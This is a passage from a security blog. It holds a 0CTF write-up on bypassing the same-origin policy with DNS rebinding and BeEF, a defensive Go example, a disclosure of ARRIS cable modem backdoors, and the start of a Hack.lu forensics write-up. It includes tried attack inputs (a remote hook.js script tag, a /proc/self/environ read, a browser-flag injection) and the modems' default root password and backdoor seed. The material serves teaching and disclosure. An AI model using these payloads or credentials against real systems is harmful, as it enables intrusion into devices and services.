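		go func(id int) {
			for n := uint64(0); ; n++ {
				select {
				case <-stop: // another worker already found a solution
					return
				default:
				}
				candidate := fmt.Sprintf("w%d-%d", id, n)
				if hasMD5Prefix(candidate, prefix) {
					// Only the first finder publishes the answer and stops the rest.
					once.Do(func() { found <- candidate; close(stop) })
					return
				}
			}
		}(w)
	}
	return <-found
}

func main() {
	// Assumed challenge prefix; the real one comes from the task page.
	prefix := "abcdef"
	answer := solvePOW(prefix)
	fmt.Printf("%s -> md5 %x\n", answer, md5.Sum([]byte(answer)))
}
```

The stop channel is checked once per candidate, so every worker exits shortly after the first hit instead of burning CPU until the process ends.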
<br />
<div class="separator" style="clear: both; text-align: left;">
Solving the Proof-of-Work:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkVzwtQBDZfy1tPHSmjMfN62DDL7I4wMT8IVVHgUGg8t57ykiJI5s-e37x9kAZyNo-PSwjc4zhyajouq9RiklMJjrAefqtNaSpgPPOYV9YRlv190YrN4Bo3SUyVG8namFDDOMZETqOmF8Z/s1600/Screen+Shot+2016-03-13+at+16.26.49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkVzwtQBDZfy1tPHSmjMfN62DDL7I4wMT8IVVHgUGg8t57ykiJI5s-e37x9kAZyNo-PSwjc4zhyajouq9RiklMJjrAefqtNaSpgPPOYV9YRlv190YrN4Bo3SUyVG8namFDDOMZETqOmF8Z/s400/Screen+Shot+2016-03-13+at+16.26.49.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Same-Origin-Policy and CORS</b></div>
<b><br /></b>
The Same-Origin Policy (SOP) treats pages as residing in the same origin when they share URI scheme, hostname and port. If any of these three attributes differs, the resource is in a different origin. Hence, resources served from the same scheme, hostname and port can interact without restriction.<br />
<br />
If you try to use an XMLHttpRequest to send a request to a different origin, you can’t read the response. However, the request will still arrive at its destination. This policy prevents a malicious script on one page from obtaining access to sensitive data (both the header and the body) on another web page, on a different origin.<br />
<br />
For this particular CTF challenge, if the secret internal webpage had had an insecure CORS header like "Access-Control-Allow-Origin: *", we would be able to retrieve its data with no effort. This, of course, was not the case.<br />
<div>
<br /></div>
<b><br /></b>
<b>Bypassing the Same-Origin</b><br />
<br />
The flag was accessible on an internal webserver hosted at http://127.0.0.1:8080/secret. The first thing we did was hooking the monkey's browser using <a href="https://github.com/beefproject/beef">BeEF</a>, so we could fingerprint his device, platform, plugins and components.<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjupZD4IIX892C8JphnxQoWLP0qBdk0F10V0y_LRMJvxkMWmr6jzsM3ZeYwmjQRa8w05PKN86mmWvtluyrUKFCad2RANdxjoOcfyNf676Uq3C9Dd2fewVWsOWfAvPeMzaslRYK4AnbKxEP-/s1600/Screen+Shot+2016-03-13+at+15.19.50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjupZD4IIX892C8JphnxQoWLP0qBdk0F10V0y_LRMJvxkMWmr6jzsM3ZeYwmjQRa8w05PKN86mmWvtluyrUKFCad2RANdxjoOcfyNf676Uq3C9Dd2fewVWsOWfAvPeMzaslRYK4AnbKxEP-/s400/Screen+Shot+2016-03-13+at+15.19.50.png" width="256" /></a></div>
<br />
There was nothing interesting here: a custom user-agent and no known vulnerable component. We enumerated the chars accepted by the server with the following script:<br />
<br />
<script src="https://gist.github.com/bmaia/255d3f4210998ed19c3b.js"></script>
Unfortunately, the server was rejecting special chars like spaces (%20 and +) and there was no sign of command injection. Our evil plan to input <b>--disable-web-security $URL</b> to disable Chrome's SOP didn't work, so we had to find other ways to retrieve the secrets.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi81vq1F0VoynDsDLzZ2Pci13EOUQq4Xc8S89tahhPfiGUsQoN_BTb9X9UIeQ6CsjZPU8kVt5pR0yihxTrLTkM1j1D5lDlyOiS-92guRbpTYrNS-7kxzWc9yG7g54A759cmiww8aBtosPqf/s1600/Screen+Shot+2016-03-13+at+17.43.37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi81vq1F0VoynDsDLzZ2Pci13EOUQq4Xc8S89tahhPfiGUsQoN_BTb9X9UIeQ6CsjZPU8kVt5pR0yihxTrLTkM1j1D5lDlyOiS-92guRbpTYrNS-7kxzWc9yG7g54A759cmiww8aBtosPqf/s640/Screen+Shot+2016-03-13+at+17.43.37.png" width="640" /></a></div>
<br />
We also thought about using data: URIs and file: schemes to load a malicious script/webpage, but it wouldn't help us bypass the SOP. We tried to input URLs like <b><html><script/**/src='http://www.example.com:8000/hook.js'></script></html></b> and <b>file:///proc/self/environ</b> (setting custom headers with a malicious HTML), but that is also known not to work on modern browsers.<br />
<br />
<br />
<b>DNS Rebinding</b><br />
<br />
After some discussion, we came to the conclusion that we needed to perform a DNS Rebinding attack. <a href="https://twitter.com/devttyS0">devttys0</a> presented about <a href="https://www.defcon.org/images/defcon-18/dc-18-presentations/Heffner/DEFCON-18-Heffner-Routers.pdf">this class of vulnerabilities at DEFCON 18</a> and <a href="https://twitter.com/mikispag">@mikispag</a> recently wrote a detailed post describing how to use <a href="https://miki.it/blog/2015/4/20/the-power-of-dns-rebinding-stealing-wifi-passwords-with-a-website/">DNS rebinding to steal WiFi passwords</a>.<br />
<br />
DNS rebinding is a technique that can be used to perform a breach of same-origin restrictions, enabling a malicious website to interact with a different domain. The possibility of this attack arises because the segregations in the SOP are based primarily on domain name and port, whereas the ultimate delivery of HTTP requests involves converting domain names into IP addresses.<br />
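As an added example (not from the write-up, nor from BeEF or BIND), here is the defensive side of the two points made above about CORS and DNS rebinding. The secret service on 127.0.0.1:8080 would have survived the rebinding if it had checked the Host header: the browser keeps sending the original hostname (ctf.example.com:8080) after the A record flips to 127.0.0.1, so the request reaches the loopback socket with a Host value the service should never see. And a CORS allow-list instead of <b>Access-Control-Allow-Origin: *</b> keeps responses unreadable by arbitrary origins. The allow-list values and the function names are assumptions.<br />

```go
package main

import (
	"fmt"
	"log"
	"net"
	"net/http"
	"strings"
)

// allowedHosts lists the Host header values a loopback-bound internal
// service should accept (constructed values). A DNS-rebound request
// carries the attacker's domain in Host, so this check defeats rebinding
// even though the TCP connection genuinely arrives on 127.0.0.1.
var allowedHosts = map[string]bool{
	"127.0.0.1": true,
	"localhost": true,
}

// allowedOrigins is the CORS allow-list (constructed value); it replaces
// the wildcard "Access-Control-Allow-Origin: *" the post mentions.
var allowedOrigins = map[string]bool{
	"http://intranet.example.internal": true,
}

// hostAllowed strips an optional ":port" and checks the allow-list.
func hostAllowed(hostHeader string) bool {
	host := hostHeader
	if h, _, err := net.SplitHostPort(hostHeader); err == nil {
		host = h
	}
	return allowedHosts[strings.ToLower(host)]
}

// corsOriginFor returns the value for Access-Control-Allow-Origin given a
// request Origin, or "" when no header should be sent. It echoes the
// specific origin and never "*", so only allow-listed pages can read the body.
func corsOriginFor(origin string) string {
	if allowedOrigins[origin] {
		return origin
	}
	return ""
}

// secretHandler is the protected resource, guarded by both checks.
func secretHandler(w http.ResponseWriter, r *http.Request) {
	if !hostAllowed(r.Host) {
		// Rebound request: right socket, wrong hostname. Refuse before any work.
		http.Error(w, "unexpected Host header", http.StatusBadRequest)
		return
	}
	if origin := r.Header.Get("Origin"); origin != "" {
		if acao := corsOriginFor(origin); acao != "" {
			w.Header().Set("Access-Control-Allow-Origin", acao)
			w.Header().Set("Vary", "Origin") // cache key must include Origin
		}
		// Unknown origins get no CORS header at all; the browser's SOP then
		// refuses to hand the response body to the calling page.
	}
	fmt.Fprintln(w, "secret: placeholder")
}

func main() {
	http.HandleFunc("/secret", secretHandler)
	log.Fatal(http.ListenAndServe("127.0.0.1:8080", nil))
}
```

The Host check is the one that matters for rebinding: CORS headers only govern whether a page may read a response, whereas a rebound page is, from the browser's point of view, same-origin with the target and needs no CORS at all.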
<br />
We had some issues at first because we tried to use the free DNS service from DuckDNS and it was very glitchy. For some obscure reason, we were unable to hook the user's browser when using the service.<br />
<br />
To make our life miserable, the challenge monkey would browse the site for two minutes only; we also couldn't use the DNS service from Namecheap because its minimum TTL is 60 seconds.<br />
<br />
<b><br /></b>
<b>Attack Phase</b><br />
<br />
After deciding to set up the DNS server on our own, we came up with the following attack scenario:<br />
<br />
1) User visits the beef hook page at http://ctf.example.com:8080 (IP 1.2.3.4).<br />
<br />
2) Webpage will load BeEF javascript hook and his browser will become a zombie.<br />
<br />
3) We perform a DNS Rebind to change the A Record from 1.2.3.4 to 127.0.0.1. <a href="https://twitter.com/danilonc">@danilonc</a> set the BIND Zone file with a low TTL (1 sec) and replaced the answer (lines 14-15) as soon as the browser got hooked.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-3P_o01R4Vpw6c4NjKCozymUm1wXv07Ehl-stZ52RQGKvfTJcROwu4HE3gtQkNsj6uliFvTDBOQN4gmVWrAWUy-tcyUofmCPgjWjmPjWVxTsYhRuxAHimBYLUec9Vf27B3bvsDqHRvnq/s1600/bind.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-3P_o01R4Vpw6c4NjKCozymUm1wXv07Ehl-stZ52RQGKvfTJcROwu4HE3gtQkNsj6uliFvTDBOQN4gmVWrAWUy-tcyUofmCPgjWjmPjWVxTsYhRuxAHimBYLUec9Vf27B3bvsDqHRvnq/s400/bind.PNG" width="400" /></a></div>
<br />
4) Perform a CORS request using BeEF's "Test CORS Request" module.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi66A2k1wQ2UE7o9h5uY4UkUuPUlOfEVYCmnXQ8h_AZtRcoNrjKuhvfyxwsRNxCRR-xQBsLoEl2J2eLgX0Wq59UHD8P2ED905S325-wqRahmBvBTt3CAxJLYbTLAR5waSnNYH715IKFfXIf/s1600/Screen+Shot+2016-03-12+at+18.24.15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi66A2k1wQ2UE7o9h5uY4UkUuPUlOfEVYCmnXQ8h_AZtRcoNrjKuhvfyxwsRNxCRR-xQBsLoEl2J2eLgX0Wq59UHD8P2ED905S325-wqRahmBvBTt3CAxJLYbTLAR5waSnNYH715IKFfXIf/s400/Screen+Shot+2016-03-12+at+18.24.15.png" width="400" /></a></div>
<br />
Here's a small diagram of the attack:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjf0b7dMwB271jhhbNjvYqLw67wb4jGhIVoDIZc1ecZYMlppaeFI713BLfYfKYj-cBrPwPigooxevSJBtCeaosSX_mm6-nigSGHFutqqt-oCuTFzOxd22mwxdVG6F7XfMipI6eXZQVK5f/s1600/rebinding.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyjf0b7dMwB271jhhbNjvYqLw67wb4jGhIVoDIZc1ecZYMlppaeFI713BLfYfKYj-cBrPwPigooxevSJBtCeaosSX_mm6-nigSGHFutqqt-oCuTFzOxd22mwxdVG6F7XfMipI6eXZQVK5f/s640/rebinding.png" width="640" /></a></div>
<br />
<br />
After a couple of tries we finally managed to get the flag:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1w1v9jfmeHargIKxEcOElU1kArox-WJwVr-8U_EHarThTcMTyE1CSSZ2piFIGdRUsT8PRT_DBXjs0KZjLmXJbTIvDSm_1vUC83naIrX54jrO1Cxb1ZEH7g5wneNC6EEbxvUfg6VhDaRTp/s1600/Screen+Shot+2016-03-12+at+18.46.56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1w1v9jfmeHargIKxEcOElU1kArox-WJwVr-8U_EHarThTcMTyE1CSSZ2piFIGdRUsT8PRT_DBXjs0KZjLmXJbTIvDSm_1vUC83naIrX54jrO1Cxb1ZEH7g5wneNC6EEbxvUfg6VhDaRTp/s640/Screen+Shot+2016-03-12+at+18.46.56.png" width="640" /></a></div>
<br />
Flag: <b>0ctf{monkey_likes_banananananananaaaa}</b><br />
<br />
<b>ARRIS Cable Modem has a Backdoor in the Backdoor</b> (Bernardo Rodrigues, published 2015-11-19)<br />
<br />
<span style="font-family: inherit;">A couple of months ago, some friends invited me to give a talk at <a href="http://www.nullbyte-con.org/">NullByte Security Conference</a>. I started studying some <strike>embedded device</strike> junk hacking hot topics and decided to talk about cable modem security. <a href="https://twitter.com/drspringfield">Braden Thomas</a> keynoted at Infiltrate 2015 discussing <a href="https://bitbucket.org/drspringfield/cabletables/downloads/PracticalAttacksOnDOCSIS.pdf">Practical Attacks on DOCSIS</a> so, yeah, cable modem hacking is still mainstream.</span><br />
<br />
On November 21st I'll be in Salvador speaking on "Hacking cable modems: The Later Years". It's not a talk about theft of service and getting free Internet access. I'll focus on the security of the cable modems, the technology used to manage them, how the data is protected and how the ISPs upgrade the firmwares. Spoiler Alert: everything's really, really bad.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW3SD6ye2ds8VDjOqKNQ3fHtnU_5G4mHd8SOF5ffiDIanaE-EffxvmhgjjZxkIdjxyFrlW45QS5ZDDZyzxt8bGqQGHIXwk1UfnkcZp0QqNfi3bAA3wFJsSIwN7LIpMYOVrEKU8QN8Il6GR/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW3SD6ye2ds8VDjOqKNQ3fHtnU_5G4mHd8SOF5ffiDIanaE-EffxvmhgjjZxkIdjxyFrlW45QS5ZDDZyzxt8bGqQGHIXwk1UfnkcZp0QqNfi3bAA3wFJsSIwN7LIpMYOVrEKU8QN8Il6GR/s320/Capturar.PNG" width="320" /></a></div>
<br />
Securing cable modems is more difficult than securing other embedded devices because, in most cases, you can’t choose your own device/firmware and software updates are almost entirely controlled by your ISP.<br />
<br />
While researching the subject, I found a previously undisclosed backdoor on ARRIS cable modems, affecting many of their devices including the TG862A, TG862G and DG860A. As of this writing, Shodan searches indicate that the backdoor affects over 600.000 externally accessible hosts, and the vendor has not yet stated whether it's going to fix it.<br />
<br />
<b><br /></b>
<b>ARRIS Backdoors</b><br />
<br />
ARRIS SOHO-grade cable modems contain an undocumented library (libarris_password.so) that acts as a backdoor, allowing privileged logins using a custom password.<br />
<br />
The following files load the backdoor library on ARRIS TG862A firmware TS0705125D_031115_MODEL_862_GW (released in 2015):<br />
<br />
<div class="code">
/usr/sbin/arris_init<br />
/usr/sbin/dimclient<br />
/usr/sbin/docsis_mac_manager<br />
/usr/sbin/ggncs<br />
/usr/sbin/gw_api<br />
/usr/sbin/mini_cli<br />
/usr/sbin/pacm_snmp_agent<br />
/usr/sbin/snmp_agent_cm<br />
/usr/www/cgi-bin/adv_pwd_cgi<br />
/usr/www/cgi-bin/tech_support_cgi</div>
<br />
The <a href="http://www.borfast.com/projects/arris-password-of-the-day-generator">ARRIS password of the day</a> is a remote backdoor known since 2009. It uses a DES-encoded seed (set by the ISP using the arrisCmDoc30AccessClientSeed MIB) to generate a daily backdoor password. The default seed is MPSJKMDHAI and, guess what, many ISPs won't bother changing it at all.<br />
<br />
The backdoor account can be used to enable Telnet and SSH remotely via the hidden HTTP Administrative interface "<a href="http://192.168.100.1/cgi-bin/tech_support_cgi">http://192.168.100.1/cgi-bin/tech_support_cgi</a>" or via custom SNMP MIBs.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjemB850vbkdZWkGoSl7YJ-22TKpSL96_Q6hEo-RcioPXQQlsDEanu1IJZRuP3-PiGTmHnb2uK2m4ZN1zluM5qRBu3_GQK_3cc5ZIakLPlx_fxdvraWPY0f0gk8BxtfleI_fsGb8aRXO6de/s1600/Screenshot-Touchstone+Technical+Support+-+Mozilla+Firefox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjemB850vbkdZWkGoSl7YJ-22TKpSL96_Q6hEo-RcioPXQQlsDEanu1IJZRuP3-PiGTmHnb2uK2m4ZN1zluM5qRBu3_GQK_3cc5ZIakLPlx_fxdvraWPY0f0gk8BxtfleI_fsGb8aRXO6de/s320/Screenshot-Touchstone+Technical+Support+-+Mozilla+Firefox.png" width="320" /></a></div>
<br />
<br />
The default password for the SSH user 'root' is 'arris'. When you access the telnet session or authenticate over SSH, the system spawns the 'mini_cli' shell asking for the backdoor password.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixPktk_PtOAJbOuyAVdZ3yFkRnPxky8UBoIMNZ_lVTPrM4D8PA_Q4fBZvR370ArT69HY9s75H9KqTNcgKZb-XsLKkFdvgIfjRcDrpw5EGeDtXCIehXtge8DIO2iMS3MVBzHgn7fNzEJ3mN/s1600/telnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="319" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixPktk_PtOAJbOuyAVdZ3yFkRnPxky8UBoIMNZ_lVTPrM4D8PA_Q4fBZvR370ArT69HY9s75H9KqTNcgKZb-XsLKkFdvgIfjRcDrpw5EGeDtXCIehXtge8DIO2iMS3MVBzHgn7fNzEJ3mN/s320/telnet.png" width="320" /></a></div>
<br />
When you log in using the password of the day, you are redirected to a restricted technician shell ('/usr/sbin/cli').<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDXde-7avcrF8JuOgZcMTNWbd_I7RZqq3xVPIvp20YQwUjJDZ6DItcgH-YuYq6qbNi0hOzjwXFA0P9D5HhZ-nLcXSn0E58OTfg3ljDss5hEmyHueTSFBXKd15HSsokEejblXyvWWlgVvry/s1600/restricted0.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDXde-7avcrF8JuOgZcMTNWbd_I7RZqq3xVPIvp20YQwUjJDZ6DItcgH-YuYq6qbNi0hOzjwXFA0P9D5HhZ-nLcXSn0E58OTfg3ljDss5hEmyHueTSFBXKd15HSsokEejblXyvWWlgVvry/s640/restricted0.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Restricted shells are ;restricted<br />
<br /></td></tr>
</tbody></table>
In order to understand how the backdoor works, I built a <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/puma5_toolchain">Puma5 toolchain (ARMEB)</a> and cross-compiled some useful tools like strace, tcpdump and gdbserver. I hosted them on my GitHub; get them here:<br />
<br />
- <a href="https://github.com/bmaia/cross-utils/tree/master/armeb">https://github.com/bmaia/cross-utils/tree/master/armeb</a><br />
<br />
While analyzing the backdoor library and the restricted shells, I found some interesting code in the authentication check:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_agXnv9q39vTkihZeG2zA__Hg98TmkXDSN2BJ-OcEs9N2SPFbEHwASsE-xg0VSy7TleVBUb5qDfW-SHq3-XN9D-EeVT5VR9xdNCqlA9cHLEeS5r4T0XXHWVbA3kKfElvNfJnSlYJEgn0D/s1600/backdoors-final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_agXnv9q39vTkihZeG2zA__Hg98TmkXDSN2BJ-OcEs9N2SPFbEHwASsE-xg0VSy7TleVBUb5qDfW-SHq3-XN9D-EeVT5VR9xdNCqlA9cHLEeS5r4T0XXHWVbA3kKfElvNfJnSlYJEgn0D/s640/backdoors-final.png" width="640" /></a></div>
<br />
<br />
Yes, they put a backdoor in the backdoor (<a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">Joel from D-Link</a> is sure to be envious). The undocumented backdoor password is based on the last five digits of the modem's serial number. You get a full busybox shell when you log on to the Telnet/SSH session using these passwords.<br />
<br />
The vendor asked not to disclose details about the password generation algorithm. I'm really relieved knowing that <a href="https://twitter.com/todb/status/648956328292057088">those awful guys from Metasploit</a> won't be able to reverse this in a timely manner.<br />
<div>
<br /></div>
<br />
<b>Vulnerability, Disclosure and Marketing</b><br />
<br />
Of course, we need a logo so the media can report on this with fancy graphs and vendors can distribute customized t-shirts at Blackhat.<br />
<br />
What I like most about <a href="https://twitter.com/lcamtuf">lcamtuf</a> is how visionary he is. While people were still writing dumb fuzzers, he <strike>wrote AFL</strike> performed a detailed <a href="https://lcamtuf.blogspot.com/2015/01/technical-analysis-of-qualys-ghost.html">Technical analysis of Qualys' GHOST</a>. Based on his analysis, I hired a couple of marketing specialists to find out the best way to disclose the ARRIS backdoor.<br />
<br />
What do we have here?<br />
<br />
- Multiple backdoors allowing full remote access to ARRIS Cable modems<br />
- An access key that is generated based on the Cable modem's serial number<br />
<br />
After a thoughtful analysis, the marketing committee advised w00tsec members to write a <a href="https://en.wikipedia.org/wiki/Keygen">Keygen</a>. In order to write a Keygen, we need some leet ASCII art and a cool chiptune. The chosen font was <a href="http://sourceforge.net/p/ansiconverter/blog/2014/07/thedraw-fonts-collection-revamp-and-extension/">ROYAFNT1.TDF</a>, from the legendary artist <a href="https://en.wikipedia.org/wiki/Superior_Art_Creations">Roy/SAC</a>, and the chiptune is <a href="https://www.youtube.com/watch?v=Syc2NnPNnZs">Toilet Story 5</a>, by <a href="http://modarchive.org/index.php?request=view_profile&query=68760">Ghidorah</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg52m8nmtqwpv81CAJTFNO_FfA53tsy8xfhXc3ajp-9eFQwcN4MRO7Z84NFiCEcCn8pb4gf-L9NGNLnD6ZD_KI3-4dQfo_qxPyzS-qgENQA_jUyjkkGau-qeaFL54mPj_-G1t7ZMj8Kwu8n/s1600/run2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg52m8nmtqwpv81CAJTFNO_FfA53tsy8xfhXc3ajp-9eFQwcN4MRO7Z84NFiCEcCn8pb4gf-L9NGNLnD6ZD_KI3-4dQfo_qxPyzS-qgENQA_jUyjkkGau-qeaFL54mPj_-G1t7ZMj8Kwu8n/s640/run2.png" width="640" /></a></div>
<br />
<br />
Here's the POC (make sure you turn the sound on):<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/pmKd69-KyhQ/0.jpg" frameborder="0" height="400" src="https://www.youtube.com/embed/pmKd69-KyhQ?feature=player_embedded" width="660"></iframe></div>
<br />
<br />
<b>Conclusion</b><br />
<b><br /></b>
I reported these flaws to <a href="https://www.cert.org/vulnerability-analysis/">CERT/CC</a> on 2015-09-13 but we didn't receive much feedback from the vendor. <a href="https://www.cert.org/vulnerability-analysis/">CERT/CC</a> was very helpful and responsive (10/10 would disclose again!). I was asked not to release the POCs immediately, so I'm going to wait for the vendor to "fix" the issue.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg21on-hp0FKuTFjaK44eA0tprc7XFbQHXakWyJwUl4ZzKXT0zz-NNoFBjNdByaAXBRZ8N0XiLaoz4OljfxeWUpqN4LxQpJLwPLBfyHtctuU02BRYbBB5iLWIW78J3wuxwywBsMs2WdYNyO/s1600/tweet2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg21on-hp0FKuTFjaK44eA0tprc7XFbQHXakWyJwUl4ZzKXT0zz-NNoFBjNdByaAXBRZ8N0XiLaoz4OljfxeWUpqN4LxQpJLwPLBfyHtctuU02BRYbBB5iLWIW78J3wuxwywBsMs2WdYNyO/s400/tweet2.png" width="400" /></a></div>
<br />
CERT/CC set a <a href="https://www.cert.org/vulnerability-analysis/vul-disclosure.cfm">disclosure policy of 45 days</a> long ago. They waited more than 65 days for the vendor to "fix" it, but ARRIS didn't remove the backdoors in a timely manner. Someone needs to update the Responsible Disclosure RFC and include a note stating that vendors shall lose disclosure points whenever they plant a backdoor on the device (ARRIS modems have a third backdoor too; check the <a href="http://console-cowboys.blogspot.com/2014/09/arris-cable-modem-backdoor-im.html">ConsoleCowboys Blog</a>).<br />
<br />
I'm pretty sure bad guys have been exploiting flaws on these devices for some time (just search for <a href="https://twitter.com/search?q=arris%20dns&src=typd">ARRIS DNS on Twitter</a>, for example). We need more people bypassing EULAs and reversing end-user software and firmware. If you haven't heard about <a href="http://firmware.re/">Firmware.RE</a>, check it out right now. A broader view of firmwares is not only beneficial but necessary to discover new vulnerabilities and backdoors, correlate different device families and show how vulnerabilities reappear across different products.<br />
<br />
To all the vendors out there, I would like to finish this post by quoting <a href="https://twitter.com/daveaitel">@daveaitel</a>:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.csoonline.com/article/2997254/security-industry/hacked-opinions-the-legalities-of-hacking-dave-aitel.html"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0BFFktJ7D1B-rwLN0dxGctcRTxtoh5yJr3rSasQ9R1ZICOCf9xP-4fJB0GPPgCkxS0kL_WrsTHoHJDy2eWgj_3-7QeGUIl-fqeGgsikDKPrWHd9h0wbt_Z6UsaVUyVU4cJrHve8FxYFw5/s400/knowing.png" width="400" /></a></div>
<br />
<b>Hack.lu 2015 CTF Write Up: Dr. Bob (Forensic 150)</b> (Bernardo Rodrigues, published 2015-10-22)<br />
<br />
<a href="http://2015.hack.lu/ctf/">Hack.lu 2015 CTF</a> was organised by <a href="https://twitter.com/fluxfingers">fluxfingers</a> during October 20-22. It's one of the coolest CTFs around; the only drawback is that it runs on weekdays (hey guys, patch this for the next years). My team <a href="https://ctftime.org/team/10288">TheGoonies</a> ranked #59, which is not bad considering we only played part-time.<br />
<br />
The task Dr. Bob was the one I found most interesting as it included disk forensics, memory forensics and basic crypto tasks.<br />
<br />
<b>Task: Dr. Bob (Forensic 150)</b><br />
<br />
<div class="code">
There are elections at the moment for the representative of the students and the winner will be announced tomorrow by the head of elections Dr. Bob. The local schoolyard gang is gambling on the winner and you could really use that extra cash. Luckily, you are able to hack into the mainframe of the school and get a copy of the virtual machine that is used by Dr. Bob to store the results. The desired information is in the file /home/bob/flag.txt, easy as that.</div>
<div>
<br /></div>
<div>
<div>
Download: <a href="https://school.fluxfingers.net/static/chals/dr_bob_e22538fa166acecc68fa17ac148dcbe2.tar.gz">dr_bob_e22538fa166acecc68fa17ac148dcbe2.tar.gz</a></div>
</div>
<div>
<br /></div>
The file provided is a VirtualBox image in a saved state. According to the challenge instructions, we have to retrieve the flag from the user's home folder. The VM starts at a login terminal of what seems to be a Linux distro.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA9LgGtbusmtCdFiFBvM4bwV53YXgkU5CkxUeus7-EqI5MrZ3a3YZjZNgu8SVPuUreGy80cW2CxDeaOMNMGIATPSx_BMfWvrg_sjP7Lhh1VnjW9M0OZZfVHOv6RkFp_-sVFcSVdrinCLyp/s1600/distro.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA9LgGtbusmtCdFiFBvM4bwV53YXgkU5CkxUeus7-EqI5MrZ3a3YZjZNgu8SVPuUreGy80cW2CxDeaOMNMGIATPSx_BMfWvrg_sjP7Lhh1VnjW9M0OZZfVHOv6RkFp_-sVFcSVdrinCLyp/s400/distro.PNG" width="400" /></a></div>
<br />
The easiest route here is to convert the VDI image to raw, mount it and extract the flag from the home folder. VirtualBox has a built-in tool to convert VDI to raw and it's as simple as:<br />
<br />
<div class="code">
C:\Program Files\Oracle\VirtualBox\VBoxManage.exe internalcommands converttoraw c:\ctf\home\dr_bob\.VirtualBox\Safe\Safe.vdi c:\ctf\safe.dd</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
